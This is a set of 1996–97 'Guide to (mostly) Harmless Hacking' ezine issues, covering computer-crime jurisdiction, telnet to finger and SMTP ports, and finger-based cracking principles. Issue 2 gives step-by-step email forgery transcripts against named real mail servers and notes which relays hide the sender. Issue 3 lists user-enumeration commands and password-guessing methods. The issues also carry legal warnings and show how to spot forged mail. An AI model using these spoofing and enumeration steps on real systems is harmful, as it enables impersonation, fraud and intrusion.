2. The Federal Reserve or a member of the Federal Reserve, including any
Federal Reserve Bank.
3. A credit union with accounts insured by the National Credit Union
Administration.
4. A member of the federal home loan bank system and any home loan bank.
5. Any institution of the Farm Credit system under the Farm Credit Act of 1971.
6. A broker-dealer registered with the Securities and Exchange
Commission(SEC) within the rules of section 15 of the SEC Act of 1934.
7. The Securities Investors Protection Corporation.
8. A branch or agency of a foreign bank (as defined in the International
Banking Act of 1978).
9. An organization operating under section 25 or 25(a) of the Federal
Reserve Act.
WHOS IN CHARGE OF BUSTING THE CRACKER WHO GETS A BIT FROGGY REGARDING
SECTION 1030?
(FBI stands for Federal Bureau of Investigation, USSS for US Secret Service)
Section of Law Type of Information Jurisdiction
1030(a)(1) National Security FBI USSS JOINT
National defense X
1030(a)(2) Foreign relations X
Restricted atomic energy X
1030(a)(2) Financial or consumer
Financial records of X
banks, other financial
institutions
Financial records of
card issuers X
Information on consumers
in files of a consumer
reporting agency X
Non-bank financial
institutions X
1030(a)(3) Government computers
National defense X
Foreign relations X
Restricted data X
White House X
All other government
computers X
1030(a)(4) Federal interest computers:
Intent to defraud X
1030(a)(5)(A) Transmission of programs, commands:
Intent to damage or deny use X
1030(a)(5)(B) Transmission off programs, commands: Reckless disregard X
1030 (a)(6) Trafficking in passwords:
Interstate or foreign commerce X
Computers used by or for
the government X
Regarding 1030 (a)(2): The FBI has jurisdiction over bank fraud violations,
which include categories (1) through (5) in the list of financial
institutions defined above. The Secret Service and FBI share joint
jurisdiction over non-bank financial institutions defined in categories (6)
and (7) in the list of financial institutions defined above.
Regarding 1030(a)(3) Government Computers: The FBI is the primary
investigative agency for violations of this section when it involves
national defense. Information pertaining to foreign relations, and other
restricted data. Unauthorized access to other information in government
computers falls under the primary jurisdiction of the Secret Service.
MORAL: CONFUCIUS SAY: “CRACKER WHO GETS BUSTED DOING ONE OF THESE CRIMES,
WILL SPEND LONG TIME IN JAILHOUSE SOUP.”
This information was swiped from _Computer Crime: A Crimefighters
Handbook_ (Icove, Seger & VonStorch. OReilly & Associates, Inc.)
_________________________________________________________
Want to see back issues of Guide to (mostly) Harmless Hacking? See either
http://www.tacd.com/zines/gtmhh/ or
http://ra.nilenet.com/~mjl/hacks/codez.htm. Or get complete archives of our
Happy Hacker list digests at http://www.infowar.com under the “Hackers” forum.
Subscribe to our email list by emailing to hacker@techbroker.com with
message "subscribe".
Want to share some kewl stuph with the Happy Hacker list? Correct mistakes?
Send your messages to hacker@techbroker.com. To send me confidential email
(please, no discussions of illegal activities) use cmeinel@techbroker.com
and be sure to state in your message that you want me to keep this
confidential. If you wish your message posted anonymously, please say so!
Please direct flames to dev/null@techbroker.com. Happy hacking!
Copyright 1997 Carolyn P. Meinel. You may forward or post on your Web site
this GUIDE TO (mostly) HARMLESS HACKING as long as you leave this notice at
the end..
________________________________________________________
Carolyn Meinel
M/B Research -- The Technology Brokers
+201
View File
@@ -0,0 +1,201 @@
Thank you for joining the HAPPY HACKER email list. Moderator is Carolyn P.
Meinel. If you have hacking tips that you wouldn't mind being read by law
enforcement types, please send them in! In the meantime, welcome to the
flagship ezine of this list. Here's...
The inaugural issue of...
_______________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 1 Number 1
Hacking tip of this column: how to finger a user via telnet.
_______________________________________________________
Hacking. The word conjures up evil computer geniuses plotting the downfall
of civilization while squirreling away billions in electronically stolen
funds in an Antigua bank.
But I define hacking as taking a playful, adventurous approach to computers.
Hackers don't go by the book. We fool around and try odd things, and when we
stumble across something entertaining we tell our friends about it. Some of
us may be crooks, but more often we are good guys, or at least harmless.
Furthermore, hacking is surprisingly easy. I'll give you a chance to prove
it to yourself, today!
But regardless of why you want to be a hacker, it is definitely a way to
have fun, impress your buddies, and get dates. If you are a female hacker
you become totally irresistible to all men. Take my word for it!;^D
This column can become your gateway into this world. In fact, after reading
just this first Guide to (mostly) Harmless Hacking, you will be able to pull
off a stunt that will impress the average guy or gal unlucky^H^H^H^H^H^H^H
fortunate enough to get collared by you at a party.
So what do you need to become a hacker? Before I tell you, however, I am
going to subject you to a rant.
Have you ever posted a message to a news group or email list devoted to
hacking? You said something like "What do I need to become a hacker?" right?
Betcha you won't try *that* again!
It gives you an education in what "flame" means, right?
Yes, some of these 3l1te types like to flame the newbies. They act like they
were born clutching a Unix manual in one hand and a TCP/IP specification
document in the other and anyone who knows less is scum.
*********************
Newbie note: 3l1t3, 31337, etc. all mean "elite." The idea is to take either
the word "elite" or "eleet" and substitute numbers for some or all the
letters. We also like zs. Hacker d00dz do this sor7 of th1ng l0tz.
********************
Now maybe you were making a sincere call for help. But there is a reason
many hackers are quick to flame strangers who ask for help.
What we worry about is the kind of guy who says, "I want to become a hacker.
But I *don't* want to learn programming and operating systems. Gimme some
passwords, d00dz! Yeah, and credit card numbers!!!"
Honest, I have seen this sort of post in hacker groups. Post something like
this and you are likely to wake up the next morning to discover your email
box filled with 3,000 messages from email discussion groups on agricultural
irrigation, proctology, collectors of Franklin Mint doo-dads, etc. Etc.,
etc., etc....arrrgghhhh!
The reason we worry about wannabe hackers is that it is possible to break
into other people's computers and do serious damage even if you are almost
totally ignorant.
How can a clueless newbie trash other people's computers? Easy. There are
public FTP and Web sites on the Internet that offer canned hacking programs.
Thanks to these canned tools, many of the "hackers" you read about getting
busted are in fact clueless newbies.
This column will teach you how to do real, yet legal and harmless hacking,
without resorting to these hacking tools. But I won't teach you how to harm
other people's computers. Or even how to break in where you don't belong.
******************************
You can go to jail tip: Even if you do no harm, if you break into a portion
of a computer that is not open to the public, you have committed a crime. If
you telnet across a state line to break in, you have committed a federal felony.
*************************************
I will focus on hacking the Internet. The reason is that each computer on
the Internet has some sort of public connections with the rest of the Net.
What this means is that if you use the right commands, you can *legally*
access these computers.
That, of course, is what you already do when you visit a Web site. But I
will show you how to access and use Internet host computers in ways that
most people didn't know were possible. Furthermore, these are *fun* hacks.
In fact, soon you will be learning hacks that shed light on how other people
(Not you, right? Promise?) may crack into the non-public parts of hosts. And
-- these are hacks that anyone can do.
But, there is one thing you really need to get. It will make hacking
infinitely easier:
A SHELL ACCOUNT!!!!
A "shell account" is an Internet account in which your computer becomes a
terminal of one of your ISP's host computers. Once you are in the "shell"
you can give commands to the Unix operating system just like you were
sitting there in front of one of your ISP's hosts.
Warning: the tech support person at your ISP may tell you that you have a
"shell account" when you really don't. Many ISPs don't really like shell
accounts, either. Guess why? If you don't have a shell account, you can't hack!
But you can easily tell if it is a real shell account. First, you should use
a "terminal emulation program" to log on. You will need a program that
allows you to imitate a VT 100 terminal. If you have Windows 3.1 or Windows
95, a VT 100 terminal program is included as one of your accessory program.
Any good ISP will allow you to try it out for a few days with a guest
account. Get one and then try out a few Unix commands to make sure it is
really a shell account.
You don't know Unix? If you are serious about understanding hacking, you'll
need some good reference books. No, I don't mean the kind with breathless
titles like "Secrets of Super hacker." I've bought too many of that kind of
book. They are full of hot air and thin on how-to. Serious hackers study
books on:
a) Unix. I like "The Unix Companion" by Harley Hahn.
b) Shells. I like "Learning the Bash Shell" by Cameron Newham and Bill
Rosenblatt. A "shell" is the command interface between you and the Unix
operating system.
c) TCP/IP, which is the set of protocols that make the Internet work. I
like "TCP/IP for Dummies" by Marshall Wilensky and Candace Leiden.
OK, rant is over. Time to hack!
How would you like to start your hacking career with one of the simplest,
yet potentially hairy, hacks of the Internet? Here it comes: telnet to a
finger port.
Have you ever used the finger command before? Finger will sometimes tell you
a bunch of stuff about other people on the Internet. Normally you would just
enter the command:
finger Joe_Schmoe@Fubar.com
But instead of Joe Schmoe, you put in the email address of someone you would
like to check out. For example, my email address is cmeinel@techbroker.com.
So to finger me, give the command:
finger cmeinel@techbroker.com
Now this command may tell you something, or it may fail with a message such
as "access denied."
But there is a more elite way to finger people. You can give the command:
telnet llama.swcp.com 79
What this command has just done is let you get on a computer with an
Internet address of llama.swcp.com through its port 79 -- without giving it
a password.
But the program that llama and many other Internet hosts are running will
usually allow you to give only ONE command before automatically closing the
connection. Make that command:
cmeinel
This will tell you a hacker secret about why port 79 and its finger programs
are way more significant than you might think. Or, heck, maybe something
else if the friendly neighborhood hacker is still planting insulting
messages in my files.
Now, for an extra hacking bonus, try telnetting to some other ports. For
example:
telnet kitsune.swcp.com 13
That will give you the time and date here in New Mexico, and:
telnet slug.swcp.com 19
Will show you a good time!
OK, I'm signing off for this column. And I promise to tell you more about
what the big deal is over telnetting to finger -- but later. Happy hacking!
*******************************************************
Want to share some kewl hacker stuph? Tell me I'm terrific? Flame me? For
the first two, I'm at cmeinel@techbroker.com. Please direct flames to
dev/null@techbroker.com. Happy hacking!
_______________________________________________________
Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly)
HARMLESS HACKING Ezine as long as you leave this notice at the end. To
subscribe, email cmeinel@techbroker.com with message "subscribe hacker
<joe.blow@my.isp.net>" substituting your real email address for Joe Blow's.
***************************************************************
+539
View File
@@ -0,0 +1,539 @@
_____________________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 1 Number 2
In this issue we learn how to forge email -- and how to spot forgeries. I
promise, this hack is spectacularly easy!
______________________________________________________________
Heroic Hacking in Half an Hour
How would you like to totally blow away your friends? OK, what is the
hairiest thing you hear that super hackers do?
It's gaining unauthorized access to a computer, right?
So how would you like to be able to gain access and run a program on the
almost any of the millions of computers hooked up to the Internet? How would
you like to access these Internet computers in the same way as the most
notorious hacker in history: Robert Morris!
It was his "Morris Worm" which took down the Internet in 1990. Of course,
the flaw he exploited to fill up 10% of the computers on the Internet with
his self-mailing virus has been fixed now -- on most Internet hosts.
But that same feature of the Internet still has lots of fun and games and
bugs left in it. In fact, what we are about to learn is the first step of
several of the most common ways that hackers break into private areas of
unsuspecting computers.
But I'm not going to teach you to break into private parts of computers. It
sounds too sleazy. Besides, I am allergic to jail.
So what you are about to learn is legal, harmless, yet still lots of fun. No
pulling the blinds and swearing blood oaths among your buddies who will
witness you doing this hack.
But -- to do this hack, you need an on-line service which allows you to
telnet to a specific port on an Internet host. Netcom, for example, will let
you get away with this.
But Compuserve, America Online and many other Internet Service Providers
(ISPs) are such good nannies that they will shelter you from this temptation.
But your best way to do this stuph is with a SHELL ACCOUNT! If you don't
have one yet, get it now!
***********************************
Newbie note #1; A shell account is an Internet account that lets you give
Unix commands. Unix is a lot like DOS. You get a prompt on your screen and
type out commands. Unix is the language of the Internet. If you want to be
a serious hacker, you have to learn Unix.
****************************
Even if you have never telnetted before, this hack is super simple. In fact,
even though what you are about to learn will look like hacking of the most
heroic sort, you can master it in half an hour -- or less. And you only need
to memorize *two* commands.
To find out whether your Internet service provider will let you do this
stuph, try this command:
telnet callisto.unm.edu 25
This is a computer at the University of New Mexico. My Compuserve account
gets the vapors when I try this. It simply crashes out of telnet without so
much as a "tsk, tsk."
But at least today Netcom will let me do this command. And just about any
cheap "shell account" offered by a fly-by-night Internet service provider
will let you do this. Many college accounts will let you get away with this,
too.
******************************
Newbie note #2: How to Get Shell Accounts
Try your yellow pages phone book. Look under Internet. Call and ask for a
"shell account."
They'll usually say, "Sure, can do." But lots of times they are lying. They
think you are too dumb to know what a real shell account is. Or the
underpaid person you talk with doesn't have a clue.
The way around this is to ask for a free temporary guest account. Any
worthwhile ISP will give you a test drive. Then try out today's hack.
*******************************
OK, let's assume that you have an account that lets you telnet someplace
serious. So let's get back to this command:
telnet callisto.unm.edu 25
If you have ever done telnet before, you probably just put in the name of
the computer you planned to visit, but didn't add in any numbers afterward.
But those numbers afterward are what makes the first distinction between the
good, boring Internet citizen and someone slaloming down the slippery slope
of hackerdom.
What that 25 means is that you are commanding telnet to take you to a
specific port on your intended victim, er, computer.
***********************************
Newbie note #3: Ports
A computer port is a place where information goes in or out of it. On your
home computer, examples of ports are your monitor, which sends information
out, your keyboard and mouse, which send information in, and your modem,
which sends information both out and in.
But an Internet host computer such as callisto.unm.edu has many more ports
than a typical home computer. These ports are identified by numbers. Now
these are not all physical ports, like a keyboard or RS232 serial port (for
your modem). They are virtual (software) ports.
***********************************
But there is phun in that port 25. Incredible phun. You see, whenever you
telnet to a computer's port 25, you will get one of two results: once in
awhile, a message saying "access denied" as you hit a firewall. But, more
often than not, you get something like this:
Trying 129.24.96.10...
Connected to callisto.unm.edu.
Escape character is '^]'.
220 callisto.unm.edu Smail3.1.28.1 #41 ready at Fri, 12 Jul 96 12:17 MDT
Hey, get a look at this! It didn't ask us to log in. It just says...ready!
Notice it is running Smail3.1.28.1, a program used to compose and send email.
Ohmigosh, what do we do now? Well, if you really want to look sophisticated,
the next thing you do is ask callisto.unm.edu to tell you what commands you
can use. In general, when you get on a strange computer, at least one of
three commands will get you information: "help," "?", or "man." In this case
I type in:
help
... and this is what I get
250 The following SMTP commands are recognized:
250
250 HELO hostname startup and give your hostname
250 MAIL FROM:<sender address> start transaction from sender
250 RCPT TO:<recipient address> name recipient for message
250 VRFY <address> verify deliverability of address
250 EXPN <address> expand mailing list address
250 DATA start text of mail message
250 RSET reset state, drop transaction
250 NOOP do nothing
250 DEBUG [level] set debugging level,default 1
250 HELP produce this help message
250 QUIT close SMTP connection
250
250 The normal sequence of events in sending a message is to state the
250 sender address with a MAIL FROM command, give the recipients with
250 as many RCPT TO commands as are required (one address per command)
250 and then to specify the mail message text after the DATA command.
250 Multiple messages may be specified. End the last one with a QUIT.
Getting this list of commands is pretty nifty. It makes you look really kewl
because you know how to get the computer to tell you how to hack it. And it
means that all you have to memorize is the "telnet <hostname> 25 " and
"help" commands. For the rest, you can simply check up on the commands while
on-line. So even if your memory is as bad as mine, you really can learn and
memorize this hack in only half an hour. Heck, maybe half a minute.
OK, so what do we do with these commands? Yup, you figured it out, this is a
very, very primitive email program. And guess why you can get on it without
logging in? Guess why it was the point of vulnerability that allowed Robert
Morris to crash the Internet?
Port 25 moves email from one node to the next across the Internet. It
automatically takes incoming email and if the email doesn't belong to
someone with an email address on that computer, it sends it on to the next
computer on the net, eventually to wend its way to the person to who this
email belongs.
Oftentimes email will go directly from sender to recipient, but if you email
to someone far away, or if the Internet is clogged with traffic, email may
go through several computers.
There are millions of computers on the Internet that forward email. And you
can get access to almost any one of these computers without a password!
Furthermore, as you will soon learn, it is easy to get the Internet
addresses of these millions of computers.
Some of these computers have very good security, making it hard to have
serious fun with them. But others have very little security. One of the joys
of hacking is exploring these computers to find ones that suit ones fancy.
OK, so now that we are in Morris Worm country, what can we do with it? Well,
here's what I did. (My commands have no number in front of them, whereas the
computer's responses are prefixed by numbers.)
helo santa@north.pole.org
250 callisto.unm.edu Hello santa@north.pole.org
mail from:santa@north.pole.org
250 <santa@north.pole.org> ... Sender Okay
rcpt to:cmeinel@nmia.com
250 <cmeinel@nmia.com> ... Recipient Okay
data
354 Enter mail, end with "." on a line by itself
It works!!!
.
250 Mail accepted
What happened here is that I sent some fake email to myself. Now let's take
a look at what I got in my mailbox, showing the complete header:
Here's what I saw using the free version of Eudora:
X POP3 Rcpt: cmeinel@socrates
This line tells us that X-POP3 is the program of my ISP that received my
email, and that my incoming email is handled by the computer Socrates.
*****************************
Evil Genius Tip: incoming email is handled by port 110. Try telnetting there
someday. But usually POP, the program running on 110, won't give you help
with its commands and boots you off the minute you make a misstep.
*****************************
Return Path: <santa@north.pole.org>
This line above is my fake email address.
Apparently From: santa@north.pole.org
Date: Fri, 12 Jul 96 12:18 MDT
But note that the header lines above say "Apparently-From" This is important
because it alerts me to the fact that this is fake mail.
Apparently To: cmeinel@nmia.com
X Status:
It works!!!
Now here is an interesting fact. Different email reading programs show
different headers. So how good your fake email is depends on part on what
email program is used to read it. Here's what Pine, an email program that
runs on Unix systems, shows with this same email:
Return Path: <santa@north.pole.org>
Received:
from callisto.unm.edu by nmia.com
with smtp
(Linux Smail3.1.28.1 #4)
id m0uemp4 000LFGC; Fri, 12 Jul 96 12:20 MDT
This identifies the computer on which I ran the smail program. It also tells
what version of the smail program was running.
Apparently From: santa@north.pole.org
And here is the "apparently-from" message again. So both Pine and Eudora
show this is fake mail.
Received: from santa@north.pole.org by callisto.unm.edu with smtp
(Smail3.1.28.1 #41) id m0uemnL 0000HFC; Fri, 12 Jul 96 12:18 MDT
Message Id: <m0uemnL 0000HFC@callisto.unm.edu>
Oh, oh! Not only does it show that it may be fake mail -- it has a message
ID! This means that somewhere on Callisto there will be a log of message IDs
telling who has used port 25 and the smail program. You see, every time
someone logs on to port 25 on that computer, their email address is left
behind on the log along with that message ID.
Date: Fri, 12 Jul 96 12:18 MDT
Apparently From: santa@north.pole.com
Apparently To: cmeinel@nmia.com
It works!!!
If someone were to use this email program to do a dastardly deed, that
message ID is what will put the narcs on his or her tail. So if you want to
fake email, it is harder to get away with it if you send it to someone using
Pine than if they use the free version of Eudora. (You can tell what email
program a person uses by looking at the header of their email.)
But -- the email programs on port 25 of many Internet hosts are not as well
defended as callisto.unm.edu. Some are better defended, and some are not
defended at all. In fact, it is possible that some may not even keep a log
of users of port 25, making them perfect for criminal email forgery.
So just because you get email with perfect-looking headers doesn't mean it
is genuine. You need some sort of encrypted verification scheme to be almost
certain email is genuine.
******************************************
You can go to jail note: If you are contemplating using fake email to commit
a crime, think again. If you are reading this you don't know enough to forge
email well enough to elude arrest.
*******************************************
Here is an example of a different email program, sendmail. This will give
you an idea of the small variations you'll run into with this hack.
Here's my command:
telnet ns.Interlink.Net 25
The computer answers:
Trying 198.168.73.8...
Connected to NS.INTERLINK.NET.
Escape character is '^]'.
220 InterLink.NET Sendmail AIX 3.2/UCB 5.64/4.03 ready at Fri, 12 Jul 1996
15:45
Then I tell it:
helo santa@north.pole.org
And it responds:
250 InterLink.NET Hello santa@north.pole.org (plato.nmia.com)
Oh, oh! This sendmail version isn't fooled at all! See how it puts
"(plato.nmia.com)" -- the computer I was using for this hack -- in there
just to let me know it knows from what computer I've telnetted? But what the
heck, all Internet hosts know that kind of info. I'll just bull ahead and
send fake mail anyhow. Again, my input has no numbers in front, while the
responses of the computer are prefaced by the number 250:
mail from:santa@north.pole.com
250 santa@north.pole.com... Sender is valid.
rcpt to:cmeinel@nmia.com
250 cmeinel@nmia.com... Recipient is valid.
data
354 Enter mail. End with the . character on a line by itself.
It works!
.
250 Ok
quit
221 InterLink.NET: closing the connection.
OK, what kind of email did that computer generate? Here's what I saw using Pine:
Return Path: <santa@north.pole.org>
Received:
from InterLink.NET by nmia.com
with smtp
(Linux Smail3.1.28.1 #4)
id m0ueo7t 000LEKC; Fri, 12 Jul 96 13:43 MDT
Received: from plato.nmia.com by InterLink.NET (AIX 3.2/UCB 5.64/4.03)
id AA23900; Fri, 12 Jul 1996 15:43:20 0400
Oops. Here the InterLink.NET computer has revealed the computer I was on
when I telnetted to its port 25. However, many people use that Internet host
computer.
Date: Fri, 12 Jul 1996 15:43:20 0400
From: santa@north.pole.org
Message Id: <9607121943.AA23900@InterLink.NET>
Apparently To: cmeinel@nmia.com
It worked!
OK, here it doesn't say "Apparently-From," so now I know the computer
ns.Interlink.Net is a pretty good one to send fake mail from. An experienced
email aficionado would know from the Received: line that this is fake mail.
But its phoniness doesn't just jump out at you.
I'm going to try another computer. Hmmm, the University of California at
Berkeley is renowned for its computer sciences research. I wonder what their
hosts are like? Having first looked up the numerical Internet address of one
of their machines, I give the command:
telnet 128.32.152.164 25
It responds with:
Trying 128.32.152.164...
Connected to 128.32.152.164.
Escape character is '^]'.
220 remarque.berkeley.edu ESMTP Sendmail 8.7.3/1.31 ready at Thu, 11 Jul
1996 12
help
214 This is Sendmail version 8.7.3
214 Commands:
214 HELO EHLO MAIL RCPT DATA
214 RSET NOOP QUIT HELP VRFY
214 EXPN VERB
214 For more info use "HELP <topic>".
214 To report bugs in the implementation send email to
214 sendmail@CS.Berkeley.EDU.
214 For local information send email to Postmaster at your site.
214 End of HELP info
Oh, boy, a slightly different sendmail program! I wonder what more it will
tell me about these commands?
HELP mail
214 MAIL FROM: <sender>
214 Specifies the sender.
214 End of HELP info
Big f***ing deal! Oh, well, let's see what this computer (which we now know
is named remarque) will do to fake mail.
MAIL FROM:santa@north.pole.org
250 santa@north.pole.org... Sender ok
Heyyy... this is interesting ... I didn't say "helo" and this sendmail
program didn't slap me on the wrist! Wonder what that means...
RCPT TO:cmeinel@techbroker.com
250 Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
This is fake mail on a Berkeley computer for which I do not have a password.
.
250 MAA23472 Message accepted for delivery
quit
221 remarque.berkeley.edu closing connection
Now we go to Pine and see what the header looks like:
Return Path: <santa@north.pole.org>
Received:
from nmia.com by nmia.com
with smtp
(Linux Smail3.1.28.1 #4)
id m0ueRnW 000LGiC; Thu, 11 Jul 96 13:53 MDT
Received:
from remarque.berkeley.edu by nmia.com
with smtp
(Linux Smail3.1.28.1 #4)
id m0ueRnV 000LGhC; Thu, 11 Jul 96 13:53 MDT
Apparently To: <cmeinel@techbroker.com>
Received: from merde.dis.org by remarque.berkeley.edu (8.7.3/1.31)
id MAA23472; Thu, 11 Jul 1996 12:49:56 0700 (PDT)
Look at the three "received" messages. My ISP's computer received this email
not directly from Remarque.berkeley.edu. but from merde.dis.com, which in
turn got the email from Remarque.
Hey, I know who owns merde.dis.org! So the Berkeley computer forwarded this
fake mail through famed computer security expert Pete Shipley's Internet
host computer! Hint: the name "merde" is a joke. So is "dis.org."
Now let's see what email from remarque looks like. Let's use Pine again:
Date: Thu, 11 Jul 1996 12:49:56 0700 (PDT)
From: santa@north.pole.org
Message Id: <199607111949.MAA23472@remarque.berkeley.edu>
This is fake mail on a Berkeley computer for which I do not have a password.
Hey, this is pretty kewl. It doesn't warn that the Santa address is phony!
Even better, it keeps secret the name of the originating computer:
plato.nmia.com. Thus remarque.berkeley.edu was a really good computer from
which to send fake mail. (Note: last time I checked, they had fixed
remarque, so don't bother telnetting there.)
But not all sendmail programs are so friendly to fake mail. Check out the
email I created from atropos.c2.org!
telnet atropos.c2.org 25
Trying 140.174.185.14...
Connected to atropos.c2.org.
Escape character is '^]'.
220 atropos.c2.org ESMTP Sendmail 8.7.4/CSUA ready at Fri, 12 Jul 1996 15:41:33
help
502 Sendmail 8.7.4 HELP not implemented
Gee, you're pretty snippy today, aren't you... What the heck, let's plow
ahead anyhow...
helo santa@north.pole.org
501 Invalid domain name
Hey, what's it to you, buddy? Other sendmail programs don't give a darn what
name I use with "helo." OK, OK, I'll give you a valid domain name. But not
a valid user name!
helo satan@unm.edu
250 atropos.c2.org Hello cmeinel@plato.nmia.com [198.59.166.165], pleased
to meet you
Verrrry funny, pal. I'll just bet you're pleased to meet me. Why the #%&@
did you demand a valid domain name when you knew who I was all along?
mail from:santa@north.pole.com
250 santa@north.pole.com... Sender ok
rcpt to: cmeinel@nmia.com
250 Recipient ok
data
354 Enter mail, end with "." on a line by itself
Oh, crap!
.
250 PAA13437 Message accepted for delivery
quit
221 atropos.c2.org closing connection
OK, what kind of email did that obnoxious little sendmail program generate?
I rush over to Pine and take a look:
Return Path: <santa@north.pole.com>
Well, how very nice to allow me to use my fake address.
Received:
from atropos.c2.org by nmia.com
with smtp
(Linux Smail3.1.28.1 #4)
id m0ueqxh 000LD9C; Fri, 12 Jul 96 16:45 MDT
Apparently To: <cmeinel@nmia.com>
Received: from satan.unm.edu (cmeinel@plato.nmia.com [198.59.166.165])
Oh, how truly special! Not only did the computer atropos.c2.org blab out my
true identity, it also revealed that satan.unm.edu thing. Grump...
that will teach me.
by atropos.c2.org (8.7.4/CSUA) with SMTP id PAA13437 for
cmeinel@nmia.com; Fri, 12
Jul 1996 15:44:37 0700 (PDT)
Date: Fri, 12 Jul 1996 15:44:37 0700 (PDT)
From: santa@north.pole.com
Message Id: <199607122244.PAA13437@atropos.c2.org>
Oh, crap!
So, the moral of that little hack is that there are lots of different email
programs floating around on port 25 of Internet hosts. So if you want to
have fun with them, it's a good idea to check them out first before you use
them to show off with.
_________________________________________________________
Want to share some kewl stuph? Tell me I'm terrific? Flame me? For the first
two, I'm at cmeinel@techbroker.com. Please direct flames to
dev/null@techbroker.com. Happy hacking!
Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly)
HARMLESS HACKING as long as you leave this notice at the end. To subscribe,
email cmeinel@techbroker.com with message "subscribe hacker
<joe.blow@boring.ISP.net>" substituting your real email address for Joe Blow's.
________________________________________________________
+216
View File
@@ -0,0 +1,216 @@
_______________________________________________________
GUIDE TO (mostly) HARMLESS HACKING
Vol. 1 Number 3
Hacking tip of the day: how finger can be used as one of the most common
ways to crack into non-public parts of an Internet host.
_______________________________________________________
Before you get too excited over learning how finger can be used to crack an
Internet host, will all you law enforcement folks out there please relax.
I'm not giving step-by-step instructions. I'm certainly not handing out code
from those publicly available canned cracking tools that any newbie could
use to gain illegal access to some hosts.
What you are about to read are some basic principles and techniques behind
cracking with finger. In fact, some of these techniques are fun and legal as
long as they aren't taken too far. And they might tell you a thing or two
about how to make your Internet hosts more secure.
You could also use this information to become a cracker. Your choice. Just
keep in mind what it would be like to be the "girlfriend" of a cell mate
named "Spike."
*********************************
Newbie note #1: Many people assume "hacking" and "cracking" are synonymous.
But "cracking" is gaining illegal entry into a computer. "Hacking" is the
entire universe of kewl stuff one can do with computers, often without
breaking the law or causing harm.
*********************************
What is finger? It is a program which runs on port 79 of many Internet host
computers. It is normally used to provide information on people who are
users of a given computer.
For review, let's consider the virtuous but boring way to give your host
computer the finger command:
finger Joe_Blow@boring.ISP.net
This causes your computer to telnet to port 79 on the host boring.ISP.net.
It gets whatever is in the .plan and .project files for Joe Blow and
displays them on your computer screen.
But the Happy Hacker way is to first telnet to boring.ISP.net port 79, from
which we can then run its finger program:
telnet boring.ISP.net 79
If you are a good Internet citizen you would then give the command:
Joe_Blow
or maybe the command:
finger Joe_Blow
This should give you the same results as just staying on your own computer
and giving the command "finger Joe_Blow@boring.ISP.net."
But for a cracker, there are lots and lots of other things to try after
gaining control of the finger program of boring.ISP.net by telnetting to
port 79.
Ah, but I don't teach how to do felonies. So we will just cover general
principles of how finger is commonly used to crack into boring.ISP.net. You
will also learn some perfectly legal things you can try to get finger to do.
For example, some finger programs will respond to the command:
finger @boring.ISP.net
If you should happen to find a finger program old enough or trusting enough
to accept this command, you might get something back like:
[boring.ISP.net]
Login Name TTY Idle When Where
happy Prof. Foobar co 1d Wed 08:00 boring.ISP.net
This tells you that only one guy is logged on, and he's doing nothing. This
means that if someone should manage to break in, no one is likely to notice
-- at least not right away.
Another command to which a finger port might respond is simply:
finger
If this command works, it will give you a complete list of the users of this
host. These user names then can be used to crack a password or two.
Sometimes a system will have no restrictions on how lame a password can be.
Common lame password habits are to use no password at all, the same password
as user name, the user's first or last name, and "guest." If these don't
work for the cracker, there are widely circulated programs which try out
every word of the dictionary and every name in the typical phone book.
********************************
Newbie Note #2: Is your password easy to crack? If you have a shell account,
you may change it with the command:
passwd
Choose a password that isn't in the dictionary or phone book, is at least 6
characters long, and includes some characters that are not letters of the
alphabet.
A password that is found in the dictionary but has one extra character is
*not* a good password.
********************************
Other commands which may sometimes get a response out of finger include:
finger @
finger 0
finger root
finger bin
finger ftp
finger system
finger guest
finger demo
finger manager
Or, even just hitting <enter> once you are into port 79 may give you
something interesting.
There are plenty of other commands that may or may not work. But most
commands on most finger programs will give you nothing, because most system
administrators don't want to ladle out lots of information to the casual
visitor. In fact, a really cautious sysadmin will disable finger entirely.
So you'll never even manage to get into port 79 of some computers
However, none of these commands I have shown you will give you root access.
They provide information only.
************************
Newbie note #3: Root! It is the Valhalla of the hard-core cracker. "Root" is
the account on a multi-user computer which allows you to play god. It is the
account from which you can enter and use any other account, read and modify
any file, run any program. With root access, you can completely destroy all
data on boring.ISP.net. (I am *not* suggesting that you do so!)
*************************
It is legal to ask the finger program of boring.ISP.net just about anything
you want. The worst that can happen is that the program will crash.
Crash...what happens if finger crashes?
Let's think about what finger actually does. It's the first program you meet
when you telnet to boring.ISP.net's port 79. And once there, you can give it
a command that directs it to read files from any user's account you may choose.
That means finger can look in any account.
That means if it crashes, you may end up in root.
Please, if you should happen to gain root access to someone else's host,
leave that computer immediately! You'd better also have a good excuse for
your systems administrator and the cops if you should get caught!
If you were to make finger crash by giving it some command like ///*^S, you
might have a hard time claiming that you were innocently seeking publicly
available information.
*****************
YOU CAN GO TO JAIL TIP #1: Getting into a part of a computer that is not
open to the public is illegal. In addition, if you use the phone lines or
Internet across a US state line to break into a non-public part of a
computer, you have committed a Federal felony. You don't have to cause any
harm at all -- it's still illegal. Even if you just gain root access and
immediately break off your connection -- it's still illegal.
***************
Truly elite types will crack into a root account from finger and just leave
immediately. They say the real rush of cracking comes from being *able* to
do anything to boring.ISP.net -- but refusing the temptation.
The elite of the elite do more than just refrain from taking advantage of
the systems they penetrate. They inform the systems administrator that they
have cracked his or her computer, and leave an explanation of how to fix the
security hole.
************************************
YOU CAN GO TO JAIL TIP #2: When you break into a computer, the headers on
the packets that carry your commands tell the sysadmin of your target who
you are. If you are reading this column you don't know enough to cover your
tracks. Tell temptation to take a hike!
************************************
Ah, but what are your chances of gaining root through finger? Haven't
zillions of hackers found all the crashable stuph? Doesn't that suggest that
finger programs running on the Internet today are all fixed so you can't get
root access through them any more?
No.
The bottom line is that any systems adminstrator that leaves the finger
service running on his/her system is taking a major risk. If you are the
user of an ISP that allows finger, ask yourself this question: is using it
to advertise your existence across the Internet worth the risk?
OK, I'm signing off for this column. I look forward to your contributions to
this list. Happy hacking -- and don't get busted!
__________________________________________________________________
Want to share some kewl stuph? Tell me I'm terrific? Flame me? For the first
two, I'm at cmeinel@techbroker.com. Please direct flames to
dev/null@techbroker.com. Happy hacking!
_______________________________________________________
Copyright 1996 Carolyn P. Meinel. You may forward the GUIDE TO (mostly)
HARMLESS HACKING as long as you leave this notice at the end. To subscribe,
email cmeinel@techbroker.com with message "subscribe hacker
